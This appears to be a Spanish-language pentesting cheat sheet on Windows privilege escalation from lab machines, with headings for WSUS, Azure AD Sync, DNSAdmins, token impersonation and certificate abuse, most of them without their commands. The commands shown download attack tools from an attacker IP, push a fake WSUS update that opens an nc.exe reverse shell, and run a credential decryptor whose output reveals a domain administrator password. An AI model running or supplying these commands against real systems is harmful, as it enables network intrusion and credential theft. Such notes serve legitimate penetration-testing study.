Privesc

privesc

Privesc

Abuso del grupo WSUS Administrator

Archivos necesarios

iwr -uri http://10.10.14.2/SharpWSUS.exe -o SharpWSUS.exe
iwr -uri http://10.10.14.2/PsExec64.exe -o PsExec64.exe
iwr -uri http://10.10.14.2/nc.exe -o nc.exe

Reverse Shell

.\SharpWSUS.exe create /payload:"C:\Windows\Temp\Privesc\PsExec64.exe" /args:"-accepteula -s -d cmd.exe /c C:\\Windows\Temp\Privesc\\nc.exe -e cmd 10.10.14.2 443" /title:"ReverseShell"

Abuso del grupo Azure Admins

*Evil-WinRM* PS C:\Temp> iwr -uri http://10.10.16.9/AdDecrypt.exe -o AdDecrypt.exe
*Evil-WinRM* PS C:\Temp> iwr -uri http://10.10.16.9/mcrypt.dll -o mcrypt.dll
*Evil-WinRM* PS C:\> cd "C:\Program Files\Microsoft Azure AD Sync\bin"
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\bin> C:\Temp\AdDecrypt.exe -FullSQL

======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================

Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!

DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4dminyeah!
Domain: MEGABANK.LOCAL

Abuso del grupo DNSAdmins

https://rubbxalc.github.io/writeups/assets/img/Resolute-htb/1.png

Creación de binario para la reverse shell

Inserción en un servicio

Reiniciar servicio

Abuso del grupo Server Operators

Listar servicios

Modificación del BinPath de un servicio

Reinicio del proceso

Credenciales cacheadas

Firefox

Uso de firepwd.py

Primero copiar al directorio actual de trabajo el key4.db y el login.json

Listar reglas de Firewall

Abuso del privilegio SeImpersonatePrivileage

Uso de JuicyPotato

Uso de Named Pipes

Para ello es necesario aprovecharse de una tarea CRON en la que otro usuario se atachée a un named pipe alojado del atacante, de forma que se pueda impersonar para ejecutar comandos como este

Path

La estructura de llamada es así

Explotación

En caso de ser vulnerable, el script en PowerShell de decoder_it, debe devolver el nombre de usuario que se ha conectado

Alteración del script

Abuso del servicio userlogger

Detener el servicio

Explotación

Pasarle como argumento un fichero con dos puntos al final. Se le asignarán privilegios de lectura y escritura para cualquier usuario

Iniciar servicio

Obtener contenido ADS

Dumpeo de hashes NT

Obtener procesos por Identificador

Decrypt groups.xml

Golden Ticket Attack

Abuso de certificados

Abuso de ENROLLEE_SUPPLIES_SUBJECT

Puedo tratar de crear un nuevo certificado a partir de un principal ya existente en el sistema y pasarselo a Rubeus para obtener un hash NT del usuario Administrador. Para poder crearlo necesito importar ADCS.ps1 a la máquina (Active Directory Cerficate Services) y PowerView.ps1

PreviousPivotingNextCMS

Last updated